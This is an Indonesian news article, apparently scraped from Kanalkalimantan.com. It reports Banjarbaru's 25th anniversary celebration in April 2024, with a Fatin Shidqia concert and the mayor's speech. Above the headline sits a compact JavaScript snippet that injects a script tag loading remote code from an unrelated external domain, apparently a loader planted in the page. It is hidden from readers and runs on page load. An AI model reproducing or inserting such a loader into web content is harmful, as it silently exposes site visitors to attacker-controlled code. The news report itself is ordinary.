(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Fatin Shidqia Hantar Warga Ibu Kota Rayakan Hari Jadi ke-25 Kota Banjarbaru


KANALKALIMANTAN.COM, BANJARBARU – Malam puncak perayaan Hari Jadi ke-25 Kota Banjarbaru berlangsung meriah dengan ribuan penonton yang hadir di lapangan dr Murdjani depan Balai Kota Banjarbaru, Sabtu (20/4/2024) malam.

Ribuan warga Ibu Kota Provinsi Kalimantan Selatan ramaikan pesta perayaan puncak hari jadi yang diisi penampilan Fatin Shidqia.

Moment puncak Hari Jadi ke-25 Kota Banjarbaru di lapangan dr Murdjani depan Balai Kota Banjarbaru, Sabtu (20/4/2024) malam. Foto: wanda

Sebelum performance dimulai, Wali Kota Banjarbaru Aditya Mufti Ariffin mengajak semua masyarakat Kota Banjarbaru merapat ke depan balai kota untuk menikmati malam puncak acara tersebut.

Baca juga: Saling Serang Pakai Parang, R Tewas Penuh Darah di Kawasan Pasar Jumat Ratu Elok

Warga pun mulai berbondong-bondong maju lebih dekat dengan panggung utama. Seremoni penandaan puncak hari jadi Kota Banjarbaru dimulai dengan pesta kembang api yang dipusatkan dari balai kota.

Aditya Mufti Ariffin didampingi istri Vivi Zubedi, Sekretaris Daerah Provinsi Kalsel Roy Rizali dan jajaran lainnya melakukan pemotongan kue penanda hari jadi yang dirangkai pertunjukkan kembang api.

Saat namanya disebut, musisi jebolan X Factor Indonesia itu kemudian muncul di panggung utama dan disambut penonton yang sudah menunggu di depan Balai Kota Banjarbaru.

Moment puncak Hari Jadi ke-25 Kota Banjarbaru di lapangan dr Murdjani depan Balai Kota Banjarbaru, Sabtu (20/4/2024) malam. Foto: wanda

Fatin Shidqia tampil memukau dengan membawakan empat tembang lagu populernya dan dinyanyikan bersama penonton.

Baca juga: Mundur Syarat Mutlak ASN yang Maju Pilkada

Peringatan Hari Jadi ke-25 Kota Banjarbaru mengusung tema “Membangun Ibu Kota Bersama Banjarbaru Juara”.

Tema ini, dikatakan Wali Kota Aditya, sejalan dengan semangat pemerintahan dalam menyempurnakan Banjarbaru, baik sebagai Ibu Kota Provinsi Kalsel maupun sebagai gerbang Ibu Kota Negara (IKN).

Beranjak usia 25 tahun, Banjarbaru sebagai kota memiliki momen penting karena telah memasuki fase pembangunan jangka kedua.

Di usia 25 tahun yang lalu, sambung dia, Banjarbaru mulai meniti kemandirian sebagai daerah otonom dengan segala keterbatasan sumber dayanya.

Namun keterbatasan itu dijadikan motivasi bagi pemimpin pendahulu, untuk terus membangun Banjarbaru hingga menjadi ibu kota Provinsi Kalsel.

Baca juga: Lonjakan Tinggi Bawang Merah di Pasar Bauntung Banjarbaru, Segini Harganya

“Kami beruntung memiliki para pemimpin beserta tokoh-tomoh visioner dan inovatif sehingga daerah kami bermetamorfosis menjadi daerah yang lebih baik,” ujar Aditya Mufti Ariffin.

Perayaan hari jadi juga dihadiri Wali Kota dan Wakil Wali Kota se Kalimantan yang tergabung dalam Asosiasi Pemerintah Kota Seluruh Indonesia (Apeksi) Regional Kalimantan.

Aditya mengungkapkan dengan hadirnya para wali kota se Kalimantan menjadi kebahagian tersendiri bagi dirinya beserta jajaran.

Moment puncak Hari Jadi ke-25 Kota Banjarbaru di lapangan dr Murdjani depan Balai Kota Banjarbaru, Sabtu (20/4/2024) malam. Foto: wanda

“Kebersamaan kita tentunya akan menjadi insipirasi dan penyemangat bagi kami untuk melanjutkan cita-cita pembangunan daerah ke depan,” ungkapnya.

Baca juga: Kota Banjarbaru Usia 25, Wali Kota Aditya Urai Angka Capaian di Ibu Kota Kalsel

Aditya menekannya bahwa warisan semangat dan kebersamaan ini lah yang terus dicamkannya sebagai inspirasi pembangunan daerah, termasuk juga kerja sama, kerja keras, dan kerja cerdas bersama seluruh elemen masyarakat.

Acara tak hanya berakhir di malam ini, band ternama Kerispatih dan Luvia Band juga akan dijadwalkan naik panggung pada Minggu 21 April 2024 malam, pukul 20.00 Wita, sekaligus penutupan Raker Komwil V Apeksi Regional Kalimantan.

Dalam acara malam nanti juga bakal disuguhkan makanan gratis yang dijamu khusus oleh pemerintah untuk warga Kota Banjarbaru. (Kanalkalimantan.com/wanda)

Reporter: wanda
Editor: bie


Risa

Recent Posts

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

7 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

7 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

7 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

8 jam ago

Bangun Posyandu di Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pembangunan Pos Pelayanan Terpadu (Posyandu) tak luput dari sasaran Satgas TNI Manunggal… Read More

8 jam ago

Kelurahan Guntung Manggis Membidik Juara Kampung Keluarga Berkualitas Nasional

KANALKALIMANTAN.COM, BANJARBARU - Kampung Keluarga Berkualitas (KB) di Kelurahan Guntung Manggis menerima kunjungan Tim Penilai… Read More

8 jam ago

This website uses cookies.